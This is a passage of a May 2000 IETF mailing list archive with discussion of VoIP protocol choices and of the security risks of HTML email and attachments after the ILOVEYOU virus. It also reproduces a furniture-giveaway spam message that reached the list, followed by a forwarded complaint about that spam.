on such technologies, often because of poor regulations,
are too greedy to have helped these catch on yet.
Cheers,
James
>From owner-ietf-outbound Fri May 12 20:30:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA19045
for [EMAIL PROTECTED]; Fri, 12 May 2000 20:30:02 -0400 (EDT)
Received: from necom830.hpcl.titech.ac.jp (necom830.hpcl.titech.ac.jp [131.112.32.132])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA18944
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 20:24:53 -0400 (EDT)
From: Masataka Ohta <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Received: by necom830.hpcl.titech.ac.jp (8.6.11/TM2.1)
id JAA01391; Sat, 13 May 2000 09:19:55 +0859
Subject: Re: Any comparison Study on MGCP vs H.323, MGCP vs SIP
In-Reply-To:
<[EMAIL PROTECTED]>
from Christian Huitema at "May 12, 2000 02:55:58 pm"
To: Christian Huitema <[EMAIL PROTECTED]>
Date: Sat, 13 May 2000 09:19:55 +0859 ()
CC: "'Yixin Zhu'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
X-Mailer: ELM [version 2.4ME+ PL68 (25)]
X-Loop: [EMAIL PROTECTED]
Christian;
> Do you intend to replace H.323 ?
> Definitely not. Just look at the picture above, which shows the relaying of
> a call
> between an SGCP controlled gateway and an H.323 agent. The combination of
> gateways plus call agent forms a distributed H.323 system, which is
> perfectly conforming to the H.323 standard...
> If not H.323, why not SIP, then?
> In fact, when we realized that we could not use H.323 between the call agent
> and the gateways, we tried to base the design of SGCP on SIP. But we
> stumbled on the fact that SIP is a peer to peer protocol, while we needed a
> master slave protocol. However, interworking between SIP and SGCP is very
> easy...
Technical comparisons are irrelevant.
For VoIP over telephony networks (that is, mostly over non-Internet
networks), H.323 and SS7 are the protocols to choose, because they
are defined by ITU-T.
As I pointed it out with regard to iMODE and WAP, an attempt to promote
protocols like SIP, a NAT friendly protocol even more complex than
H.323, was based on a wrong strategy destroying the Internet into a
collection of mostly-non-IP networks connected by application/transport
gateways with mostly-non-IETF application/transport protocols.
For IETF (IETF is for Internet not IP) style VoIP, that is, Internet
telephony, SGCP, MGCP, H.323 and SIP are all wrong that it is a waste
of mailing list bandwidth to compare them.
This mail of mine is not an exception, unless I make the following
advertisement:
If you are interested in Internet telephony, see you at
INET'2000 in Yokohama for the presentation of our paper
"The Simple Internet Phone".
;-)
Masataka Ohta
>From owner-ietf-outbound Fri May 12 23:40:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA22604
for [EMAIL PROTECTED]; Fri, 12 May 2000 23:40:02 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA22566
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 23:37:37 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id VAA28412
for [EMAIL PROTECTED] env-from <vjs>;
Fri, 12 May 2000 21:37:39 -0600 (MDT)
Date: Fri, 12 May 2000 21:37:39 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: HTML in e-mail
X-Loop: [EMAIL PROTECTED]
} From: Christian Huitema <[EMAIL PROTECTED]>
} ... Maps and pictures, songs and recordings come to
} mind. There was a rationale for creating MIME.
Certainly! there are cases where pictures are best or even necessary.
} Framing the debate as ASCII versus HTML is a bit reductive.
true, but if you could get the HTML above all else enthusiasts to consider
the possibility that the typical ASCII wrapped in HTML email is stupid,
progress might be made. When was the last time you saw an HTML email
message of any flavor that was not merely pure ASCII (or one of the fancy
character sets that don't need HTML) slightly prettified?
} The real
} separation here is self-contained versus network based. Carrying a picture
} in a message is definitely valuable, carrying a link to a picture that is
} stored on some random web site creates an obvious privacy risk -- the URL
} itself can be the hidden communication channel that tracks you.
That's an important point about URL'st that I've been trying to make,
apparently with absolutely no success. However, I'm not sure yours is
the important separation. Even self-contained pictures can carry security
risks. What if in the name of compression, pictures are programs that
render themselves? What about a program that makes navigating among a
bunch of pictures easier, perhaps in the popular style of active buttons
on web pages? I think the separation is more "active" vs. "static," with
"active" understood by the professionally paranoid who worry about covert
channels and so forth. Or at least with a sandbox kind of attitude, and
to blazes with the claims that the user unfriendliness of a sandbox trumps
security worries.
.............
] From: "James P. Salsman" <[EMAIL PROTECTED]>
] ...
] > How can [EMAIL PROTECTED] know if the attached executible
] > file is safe or not?
]
] If I knew that, I wouldn't be trying to stop complacency
] about the promiscous exchange of self-extracting archives.
]
] The best attempts to address the issues so far involve
] "certificate-signed executables", a cryptological method of
] verifying that some certificate authority approves of a
] given fixed string of bits. Do a search on that and/or
] "application signing" to learn more. A caveat in practice,
] though, so far signed executables do not seem to have
] caught on. At best, they are complicated to get right and
] involve an increased support cost if done wrong. At worst,
] the certificate authorities, who often have a strangle-hold
] on such technologies, often because of poor regulations,
] are too greedy to have helped these catch on yet.
I hope that's not the very strange notion popular in some areas that
authentication and authorization are the same. That an ActiveX applet is
signed with a large company's key or even my key should *NOT* imply that
is authorized to do anything and everything to your computer.
Never mind that in the case at issue, we should expect that a good version
of the visual basic worm would sign its transmissions with the console
user's key, since one wouldn't want to force the console user do something
so user-unfriendly as type a passphrase merely to sign email.
..............
> From: Jacob Palme <[EMAIL PROTECTED]>
> ...
> Why should not graphics be of value in e-mail, when it is of
> value in most other media like web pages, books, newspapers,
> magazines, etc? Why should the e-mail medium not benefit
> from graphics to enhance understandability and readability?
> ... This means that
> neatly formatted messages give a cost/benefit gain, if
> the number of recipients of a message is over a certain
> limit. Thus, neatly formatted messages are more worth the
> cost if you are mailing to a large mailing list than to
> a single recipient.
> ... I often include screen
> shots showing how ther software does not work properly.
> ...
> This is, I believe, the crucial point. HTML in e-mail
> has got a bad reputation, not because the idea of
> graphics in e-mail is wrong, but because it is
> used, tooo much, by people sending us things
> we would prefer not to get.
My translation of that is:
- in a very few cases, such as screen shots of bugs, HTML pictures
are worth a 1000 words and the extra trouble required of the recipient
to deal with their security problems. Never mind whether a screen
shot would be better sent as GIF, TIFF, JPG or other forms instead of
HTML, or whether in practice the HTML would consist of more than an
<HREF> to a .jpg or .gif elsewhere.
- experienced people who are not employed by the mass media don't like
HTML in email in part because it is commonly used if email were a
cheaper, more direct, and less voluntary kind of broadcast TV.
Many people agree with both sentiments.
They don't address insanity such as Content-Type: application/ms-tnef.
As far as I can tell, that's Microsoft's embrace-and-extend alternative
to the open standard foolishness of sending plaintext ASCII with HTML.
Judging from some of my private correspondents, in practice it cannot be
turned off by experienced, entirely computer literate but not professional
expert users. As others have pointed out, one of the unintended evils of
such things is that users are trained to open without thinking any and
all attachments.
In other words, those who advocate insecure systems such as Windows 98 or
Windows NT 4.0 as installed by anyone except an expert are not only
culpable for the insecurity of those systems, but also for forcing
100,000,000's of people to develop the inexcusably insecure habit of
unthinkingly opening any and all email attachments.
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Sat May 13 03:50:22 2000
Received: by ietf.org (8.9.1a/8.9.1a) id DAA06386
for [EMAIL PROTECTED]; Sat, 13 May 2000 03:50:03 -0400 (EDT)
Received: from prserv.net (out1.prserv.net [32.97.166.31])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id DAA06355
for <[EMAIL PROTECTED]>; Sat, 13 May 2000 03:43:57 -0400 (EDT)
Received: from cs.columbia.edu ([139.92.232.170])
by prserv.net (out1) with SMTP
id <2000051307433325201q04fre>; Sat, 13 May 2000 07:43:34 +0000
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 12 May 2000 04:54:57 -0400
From: Henning Schulzrinne <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.7 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Hubert Chang <[EMAIL PROTECTED]>
CC: "'Yixin Zhu '" <[EMAIL PROTECTED]>, "'[EMAIL PROTECTED] '" <[EMAIL PROTECTED]>
Subject: Re: Any comparison Study on MGCP vs H.323, MGCP vs SIP
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
http://www.cs.columbia.edu/sip has a FAQ addressing this topic.
>From owner-ietf-outbound Sat May 13 05:20:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id FAA06908
for [EMAIL PROTECTED]; Sat, 13 May 2000 05:20:02 -0400 (EDT)
Received: from prserv.net (out1.prserv.net [32.97.166.31])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id FAA06868
for <[EMAIL PROTECTED]>; Sat, 13 May 2000 05:19:38 -0400 (EDT)
Received: from cs.columbia.edu ([139.92.232.23]) by prserv.net (out1) with SMTP
id <2000051309172625201q04pbe>; Sat, 13 May 2000 09:17:28 +0000
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 12 May 2000 04:54:57 -0400
From: Henning Schulzrinne <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.7 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Hubert Chang <[EMAIL PROTECTED]>
CC: "'Yixin Zhu '" <[EMAIL PROTECTED]>, "'[EMAIL PROTECTED] '" <[EMAIL PROTECTED]>
Subject: Re: Any comparison Study on MGCP vs H.323, MGCP vs SIP
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
http://www.cs.columbia.edu/sip has a FAQ addressing this topic.
>From owner-ietf-outbound Sat May 13 09:01:02 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA08354
for [EMAIL PROTECTED]; Sat, 13 May 2000 09:00:01 -0400 (EDT)
Received: from mail2.rdc3.on.home.com (mail2.rdc3.on.home.com [24.2.9.41])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA08323
for <[EMAIL PROTECTED]>; Sat, 13 May 2000 08:54:36 -0400 (EDT)
Received: from home.com ([24.114.113.69]) by mail2.rdc3.on.home.com
(InterMail vM.4.01.02.00 201-229-116) with ESMTP
id <[EMAIL PROTECTED]>;
Sat, 13 May 2000 05:54:31 -0700
Message-ID: <[EMAIL PROTECTED]>
Date: Sat, 13 May 2000 08:54:10 -0400
From: Garreth Jeremiah <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
X-Mailer: Mozilla 4.7 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: salavat <[EMAIL PROTECTED]>
CC: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Thought about Security
References: <000001bfbc3f$cebfc8a0$b11686d4@magazov>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
> I think you just should not open an attachments unless you are absolutely
> sure it is safe. I mean you know what is in the attachment and it doesn't
> sound odd like subject ILOVEYOU from IETF mailing list.
Just look at you inbox now - loads of Re: VIRUS WARNING and there were a
few Re: I LOVE YOU messages. The subject line was a very well
engineered one ( deliberate r not ) and could easily have been any of
thse
Re: messages
>From owner-ietf-outbound Sat May 13 12:23:37 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA09629
for [EMAIL PROTECTED]; Sat, 13 May 2000 12:23:19 -0400 (EDT)
Received: from furniture-giveaway.com ([204.120.0.7])
by ietf.org (8.9.1a/8.9.1a) with SMTP id MAA09536
for <[EMAIL PROTECTED]>; Sat, 13 May 2000 12:16:27 -0400 (EDT)
From: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: $5000 in Exquisite Quality Home Furnishings Absolutely Free
Date: Sat, 13 May 2000 12:17:51
Message-Id: <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/html; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
<html>
<head>
<title>BeaverHome - Exquisite Quality Home Furnishings Sensibly Priced</title>
</head>
<body>
<table cellspacing="0" cellpadding="0">
<tr>
<td width="90" height="90" rowspan="2" align="left" valign="top"
bgcolor="#CC9933">
<a href="http://furniture-giveaway.com/index.html">
<img src="http://furniture-giveaway.com/_images/a_logo.gif" border="0"
alt="">
</a>
</td>
<td width="600" height="70" colspan="2" align="center" valign="middle"
bgcolor="#cc9933">
<a href="http://furniture-giveaway.com/5000giveaway.html"
target="_blank">
<img src="http://furniture-giveaway.com/_banners/5000.gif" border="0"
alt="">
</a>
</td>
</tr>
<tr bgcolor="#cc9933">
<td height="25" colspan="2" align="right" bordercolor="Green"
background="http://furniture-giveaway.com/_images/bg.gif">
<a href="http://furniture-giveaway.com/index.html"
target="_blank"><img src="http://furniture-giveaway.com/_images/bth_home1.gif"
width="100" height="20" border="0" alt="HOME" align="middle"></a><a
href="http://furniture-giveaway.com/flooring/index.html"><img
src="http://furniture-giveaway.com/_images/bth_flooring1.gif"
width="100" height="20" border="0" alt="FLOORING"
align="middle"></a><a
href="http://furniture-giveaway.com/furniture/index.html"><img
src="http://furniture-giveaway.com/_images/bth_furniture1.gif"
width="100" height="20" border="0" alt="FURNITURE"
align="middle"></a><a
href="http://furniture-giveaway.com/doors/index.html"><img
src="http://furniture-giveaway.com/_images/bth_doors1.gif"
width="100" height="20" border="0" alt="DOORSandTRIM"
align="middle"></a><a
href="http://furniture-giveaway.com/kitchen/index.html"><img
src="http://furniture-giveaway.com/_images/bth_kitchen1.gif" width="100" height="20"
border="0" alt="KITCHENandBATH" align="middle"></a>
</td>
</tr>
<tr valign="baseline" bgcolor="#CC9933">
<td>
<a href="http://furniture-giveaway.com/index.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/btitl_beaverhome.gif"
border="0" alt=""><br>
</a>
</td>
<td colspan="2" align="center" bgcolor="#FFCC66">
<b><a href="http://furniture-giveaway.com/index.html" target="_blank">WELCOME
TO BEAVERHOME</a></b>
</td>
</tr>
<tr>
<td height="" valign="top" bgcolor="#FFCC66">
<a href="http://furniture-giveaway.com/index.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/btv_welcome1.gif"
border="0" alt=""><br>
</a>
<a href="http://furniture-giveaway.com/contact.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/btv_contact1.gif"
border="0" alt=""><br>
</a>
<a href="http://furniture-giveaway.com/ordering.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/btv_ordering1.gif"
border="0" alt=""><br>
</a>
<a href="http://furniture-giveaway.com/shipping.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/btv_shipping1.gif"
border="0" alt=""><br>
</a>
<a href="http://furniture-giveaway.com/survey.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/btv_survey1.gif"
border="0" alt=""><br>
</a>
<a href="http://furniture-giveaway.com/privacy.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/btv_privacy1.gif"
border="0" alt=""><br>
</a>
<a href="http://furniture-giveaway.com/about.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/btv_about1.gif"
border="0" alt=""><br>
</a>
</td>
<td height="100" colspan="2" align="center" bgcolor="#FFFFCC">
<a href="http://furniture-giveaway.com/index.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/head_home.jpg"
border="0" align="middle" alt="">
</a>
</td>
<tr align="left" valign="top" bgcolor="#FFCC66">
<td>
<a href="http://furniture-giveaway.com/wny/index.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/btv_wny1.gif"
border="0" alt="">
</a>
<br>
<a href="http://furniture-giveaway.com/40percent.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/40percent.gif"
border="0" alt=""><br>
<br>
<a href="http://furniture-giveaway.com/survey.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/b1_100bucks.gif"
border="0" alt="">
</a>
</a>
</td>
<td align="left" bgcolor="White">
<br>
<blockquote>
<h2>Find L.G. the Dog <font color="#cc0000">$5,000 BeaverBucks</font>
Giveaway</h2>
<br>
<br>
Why...
<br>
<br>
...would <a href="http://furniture-giveaway.com/index.html"
target="_blank">BeaverHome</a>, a manufacturer of "Exquisite quality home furnishings,
sensibly priced."(TM) give away <a
href="http://furniture-giveaway.com/5000giveaway.html" target="_blank">$5,000
BeaverBucks?</a>
<br>
<br>
It's simple. Three reasons!
<br>
<br>
<ol type="1" start="1">
<li>We have proudly admitted that there is not
one good brain cell left among our stressed-out marketing Beavers. We are just a bunch
of hard-working, hard-playing, fun-loving Beavers. Our web sites are beloved among
consumers, as it is our customers that have directed our web site design for the last
three years. So, who else to ask how to make our business even better, than you, our
customer! We are giving away $5,000 BeaverBucks in exchange for information and for
your guidance.
<li>The transition from Spring to Summer is a
wonderful time for our human friends. Beavers are no different. We come out of our
lodges, and we sun bathe, and feel all warm and fuzzy. We want one family to feel like
a Beaver warming himself in the Spring to Summer transition. What better way to
celebrate then to be informed that on the first day of summer 2000, you had won $5,000
dollars to makeover your home?
<li>By using the information you provide us in
this survey we learn more about what each of you are looking for in home furnishings
products. This helps us plan production. We can develop special runs of a particular
product. If we plan to produce 100 teak sun loungers, rather than 10, our cost of
production goes down by the efficiency of the run. With increases in efficiency, and
therefore lower production costs, we can pass on even greater savings to you all,
above our already silly BeaverPricing.</ol>
<h2>Rules</h2>
<p>Here are the rules...</p>
<ul type=shape><li type=disc>You must agree to
help find L.G. The Beavers need your help. If the Big Beaver does not find his little
dog, everyone will be miserable here in the BeaverPond.
<li type=disc>You must fill-out the
questionnaire in its entirety. Any uncompleted questionnaires will not qualify for the
draw.
<li type=disc>You agree to accept our weekly
e-mailer for a minimum of 12 weeks. If at any time after that you choose to be removed
from our e-mail list, we will do so immediately upon your request. It is unlikely
anyone would want to be removed, frankly our graphically enhanced e-mailer is so much
fun and so well designed, and many people tell us they wait on Saturday afternoon for
their arrival. However, if after the 12 weeks you want off the list, we will comply
with your request.
<li type=disc>$5,000 BeaverBucks can be
applied toward any BeaverHome flooring, furniture, door/trim and/or kitchen/bath
product, and can be combined with any running specials.
<li type=disc>All entrants must be 18 or over,
or submit the survey on behalf of their parents.
<li type=disc>Beavers, Squirrels and their
families CAN NOT participate in this contest!</ul>
<p>If you accept the rules above, please <a
href="http://furniture-giveaway.com/5000.htm">proceed</a> by following the link behind
the icon below!</p>
<div align="center">
<a href="http://furniture-giveaway.com/5000giveaway.html" target="_blank">
<img src="http://furniture-giveaway.com/_images/a_5000.gif" border="1" alt="">
</a>
</div>
<br>
<br>
<br>
<div align="center">
<hr width="85%" size="1" noshade>
</div>
If you need assistance with any of our product lines, do not hesitate to give us a
call, toll-free at: 1 (888) 595-HOME (4663)!
<br>
<br>
You can reach our Customer Service Beavers Mon-Sat 7am-9pm.
<div align="center">
<hr width="85%" size="1" noshade>
</div>
<br>
In a constant effort to be known as responsible members of the Internet community, <a
href="http://furniture-giveaway.com/index.html" target="_blank">BeaverHome</a> will
forward any removal requests to the E Mail preference service that is provided by the
Direct Marketing Association. The URL is <a href="http://www.e-mps.org/en/"
target="_blank">http://www.e-mps.org/en/</a> and is designed to cut down on the amount
of commercial e-mail consumers receive in their e-mail. <br><br>
If you have recieved this email in error or would like to be removed, either fill in
your email address in the form below and click remove <a href="mailto:
[EMAIL PROTECTED]? Subject=Remove">"REMOVE"</a> or call our
automated removal service toll free 877 899 2399!
<center><form action="http://www.furniture-giveaway.com/cgi-bin/FormMail.cgi"
method="POST">
<input type="hidden" name="recipient"
value="[EMAIL PROTECTED]">
<input type="hidden" name="subject"
value="E-mail List - furniture-giveaway.com">
<input type="hidden" name="redirect"
value="http://furniture-giveaway.com/thankyou.html">
<input type="hidden" name="required"
value="email">
<input type="hidden"
name="missing_fields_redirect" value="http://furniture-giveaway.com/error.html">
<input type="text" name="email"
value="youremail" size="10" maxlength="30">
<input type="Radio" name="CONTENT"
value="html">html <input type="Radio" name="CONTENT" value="text">text
<select name="what" size="1">
<option value="subscribe" selected>subscribe
<option value="remove">remove
</select>
<input type="submit" name="submit"
value="submit">
</form>
</center>
<hr size="1" width="85%" noshade>
This message and its entire contents are (c)2000 by <a
href="http://furniture-giveaway.com/index.html" target="_blank">BeaverHome</a> and may
not be reproduced in any form without prior written permission from <a
href="http://furniture-giveaway.com/index.html" target="_blank">BeaverHome</a>
</blockquote>
</td>
<!-- Banner Section Starts -->
<td width="175" align="left" valign="top" bgcolor="#FFFFCC">
<div align="center"><hr width="150" noshade></div>
<a href="http://furniture-giveaway.com/5000giveaway.html"
target="_blank"><img src="http://furniture-giveaway.com/_images/bn_5000.gif"
border="1"></a>
Enter to win $5000 in BeaverBucks<br>
<a href="http://furniture-giveaway.com/5000giveaway.html" target="_blank">Read
on...</a>
<div align="center"><hr width="150" noshade></div>
<a href="http://furniture-giveaway.com/flooring/jstone/index.html"
target="_blank"><img src="http://furniture-giveaway.com/_images/bn_jerusalem.gif"
border="1" alt=""></a>
LimeStone, from Israel directly to your Home. <br>
<a href="http://furniture-giveaway.com/flooring/jstone/index.html">Click to
learn more...</a>
<div align="center"><hr width="150" noshade></div>
<a href="http://furniture-giveaway.com/flooring/rugs/index.html"
target="_blank"><img src="http://furniture-giveaway.com/_images/bn_orientalrug.gif"
border="1" alt=""></a>
Introduces the Arabian Knights Collection of "Exquisite Area Rugs"<br>
<a href="http://furniture-giveaway.com/flooring/rugs/index.html"
target="_blank">Read On...</a>
<div align="center"><hr width="150" noshade></div>
<a href="http://furniture-giveaway.com/furniture/garden/index.html"
target="_blank"><img src="http://furniture-giveaway.com/_images/bn_garden.gif"
border="1" alt=""></a>
All Garden Furniture, 15% off.<br>
<a href="http://furniture-giveaway.com/furniture/garden/catalog.html"
target="_blank">Click here...</a>
<div align="center"><hr width="150" noshade></div>
<a href="http://furniture-giveaway.com/flooring/hardwood/index.html"
target="_blank"><img src="http://furniture-giveaway.com/_images/bn_hardfloor.gif"
border="1" alt=""></a>
Hot Prices on Ash and Cherry<br>
<a href="http://furniture-giveaway.com/flooring/hardwood/special.html">Check
'em out...</a>
<div align="center"><hr width="150" noshade></div>
<a href="http://furniture-giveaway.com/furniture/leather/index.html"
target="_blank"><img src="http://furniture-giveaway.com/_images/bn_leather.gif"
border="1" alt=""></a>
Overstock Model Blowout!
<a href="http://furniture-giveaway.com/furniture/leather/special.html"
target="_blank"><br>Read
On...</a>
<div align="center"><hr width="150" noshade></div>
<a
href="http://www.furniture-giveaway.com/furniture/solidwood/catalog.html"
target="_blank"><img src="http://www.furniture-giveaway.com/_images/bn_bedroom.gif"
border="1" alt=""></a>
Solid Hardwood Bedroom and Dining Furniture.<br>
<a href="http://www.furniture-giveaway.com/furniture/solidwood/catalog.html"
target="_blank">Read On...</a>
<br>
<br>
<br>
</td>
<!-- Banner Section Ends -->
</tr>
</tr>
<tr valign="top" bgcolor="#FFCC66">
<td valign="top">
<img src="http://furniture-giveaway.com/_images/tollfree.gif" border="0"
alt="">
</td>
<td>
</td>
<td>
<div align="center">
<a href="mailto: [EMAIL PROTECTED]">Send Us E-Mail</a>
</div>
</td>
</tr>
</table>
</body>
</html>
>From owner-ietf-outbound Sat May 13 16:55:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA11687
for [EMAIL PROTECTED]; Sat, 13 May 2000 16:54:38 -0400 (EDT)
Received: from mtiwmhc26.worldnet.att.net (mtiwmhc26.worldnet.att.net [204.127.131.51])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA11627;
Sat, 13 May 2000 16:48:50 -0400 (EDT)
Received: from guy-fielder ([12.74.56.121]) by mtiwmhc26.worldnet.att.net
(InterMail vM.4.01.02.39 201-229-119-122) with ESMTP
id <20000513204820.JICL9011.mtiwmhc26.worldnet.att.net@guy-fielder>;
Sat, 13 May 2000 20:48:20 +0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
Date: Sat, 13 May 2000 15:46:58 -0500
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
From: Guy Fielder <[EMAIL PROTECTED]>
Subject: Fwd: $5000 in Exquisite Quality Home Furnishings Absolutely
Free
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="=====================_17877473==_.ALT"
X-Loop: [EMAIL PROTECTED]
--=====================_17877473==_.ALT
Content-Type: text/plain; charset="us-ascii"; format=flowed
Someone is using your mailing list for spam!!!!
>Return-Path: <[EMAIL PROTECTED]>
>Received: from ogopogo.flash.net ([209.30.2.14])
> by mtiwgwc28.worldnet.att.net
> (InterMail vM.4.01.02.39 201-229-119-122) with ESMTP
> id
> <[EMAIL PROTECTED]>
> for <[EMAIL PROTECTED]>; Sat, 13 May 2000 16:27:24 +0000
>Received: from ietf.org (odin.ietf.org [132.151.1.176])
> by ogopogo.flash.net (8.9.3/Pro-8.9.3) with ESMTP id LAA06039;
> Sat, 13 May 2000 11:27:23 -0500 (CDT)
>From: [EMAIL PROTECTED]
>Received: from furniture-giveaway.com ([204.120.0.7])
> by ietf.org (8.9.1a/8.9.1a) with SMTP id MAA09534
> for <[EMAIL PROTECTED]>; Sat, 13 May 2000 12:16:27
> -0400 (EDT)
>To: [EMAIL PROTECTED]
>Subject: $5000 in Exquisite Quality Home Furnishings Absolutely Free
>Date: Sat, 13 May 2000 12:17:51
>Message-Id: <[EMAIL PROTECTED]>
>Reply-To: [EMAIL PROTECTED]
>Mime-Version: 1.0
>Content-Type: text/html; charset="us-ascii"
>
><http://furniture-giveaway.com/index.html>
><http://furniture-giveaway.com/index.html>WELCOME TO BEAVERHOME
><http://furniture-giveaway.com/index.html>
><http://furniture-giveaway.com/contact.html>
><http://furniture-giveaway.com/ordering.html>
><http://furniture-giveaway.com/shipping.html>
><http://furniture-giveaway.com/survey.html>
><http://furniture-giveaway.com/privacy.html>
><http://furniture-giveaway.com/about.html>
>
>
>
>
>Find L.G. the Dog $5,000 BeaverBucks Giveaway
>
>
>
>
>
>
>
>>Why...
>>
>>...would <http://furniture-giveaway.com/index.html>BeaverHome, a
>>manufacturer of "Exquisite quality home furnishings, sensibly
>>priced."(TM) give away
>><http://furniture-giveaway.com/5000giveaway.html>$5,000 BeaverBucks?
>>
>>It's simple. Three reasons!
>> * We have proudly admitted that there is not one good brain cell left
>> among our stressed-out marketing Beavers. We are just a bunch of
>> hard-working, hard-playing, fun-loving Beavers. Our web sites are
>> beloved among consumers, as it is our customers that have directed our
>> web site design for the last three years. So, who else to ask how to
>> make our business even better, than you, our customer! We are giving
>> away $5,000 BeaverBucks in exchange for information and for your guidance.
>> * The transition from Spring to Summer is a wonderful time for our
>> human friends. Beavers are no different. We come out of our lodges, and
>> we sun bathe, and feel all warm and fuzzy. We want one family to feel
>> like a Beaver warming himself in the Spring to Summer transition. What
>> better way to celebrate then to be informed that on the first day of
>> summer 2000, you had won $5,000 dollars to makeover your home?
>> * By using the information you provide us in this survey we learn
>> more about what each of you are looking for in home furnishings
>> products. This helps us plan production. We can develop special runs of
>> a particular product. If we plan to produce 100 teak sun loungers,
>> rather than 10, our cost of production goes down by the efficiency of
>> the run. With increases in efficiency, and therefore lower production
>> costs, we can pass on even greater savings to you all, above our already
>> silly BeaverPricing.
>>
>>
>
>Rules
>
>
>
>>Here are the rules...
>> * You must agree to help find L.G. The Beavers need your help. If the
>> Big Beaver does not find his little dog, everyone will be miserable here
>> in the BeaverPond.
>> * You must fill-out the questionnaire in its entirety. Any
>> uncompleted questionnaires will not qualify for the draw.
>> * You agree to accept our weekly e-mailer for a minimum of 12 weeks.
>> If at any time after that you choose to be removed from our e-mail list,
>> we will do so immediately upon your request. It is unlikely anyone would
>> want to be removed, frankly our graphically enhanced e-mailer is so much
>> fun and so well designed, and many people tell us they wait on Saturday
>> afternoon for their arrival. However, if after the 12 weeks you want off
>> the list, we will comply with your request.
>> * $5,000 BeaverBucks can be applied toward any BeaverHome flooring,
>> furniture, door/trim and/or kitchen/bath product, and can be combined
>> with any running specials.
>> * All entrants must be 18 or over, or submit the survey on behalf of
>> their parents.
>> * Beavers, Squirrels and their families CAN NOT participate in this
>> contest!
>>If you accept the rules above, please
>><http://furniture-giveaway.com/5000.htm>proceed by following the link
>>behind the icon below!
>>
>>
>>
>>
>>If you need assistance with any of our product lines, do not hesitate to
>>give us a call, toll-free at: 1 (888) 595-HOME (4663)!
>>
>>You can reach our Customer Service Beavers Mon-Sat 7am-9pm.
>>
>>
>>In a constant effort to be known as responsible members of the Internet
>>community, <http://furniture-giveaway.com/index.html>BeaverHome will
>>forward any removal requests to the E Mail preference service that is
>>provided by the Direct Marketing Association. The URL is
>><http://www.e-mps.org/en/>http://www.e-mps.org/en/ and is designed to cut
>>down on the amount of commercial e-mail consumers receive in their e-mail.
>>
>>If you have recieved this email in error or would like to be removed,
>>either fill in your email address in the form below and click remove
>><mailto: [EMAIL PROTECTED]? Subject=Remove>"REMOVE" or call our
>>automated removal service toll free 877 899 2399!
>>html text subscribe remove
>>
>>This message and its entire contents are (c)2000 by
>><http://furniture-giveaway.com/index.html>BeaverHome and may not be
>>reproduced in any form without prior written permission from
>><http://furniture-giveaway.com/index.html>BeaverHome
>>
>>
>><http://furniture-giveaway.com/5000giveaway.html> Enter to win $5000 in
>>BeaverBucks
>><http://furniture-giveaway.com/5000giveaway.html>Read on...
>>
>><http://furniture-giveaway.com/flooring/jstone/index.html> LimeStone,
>>from Israel directly to your Home.
>><http://furniture-giveaway.com/flooring/jstone/index.html>Click to learn
>>more...
>>
>><http://furniture-giveaway.com/flooring/rugs/index.html> Introduces the
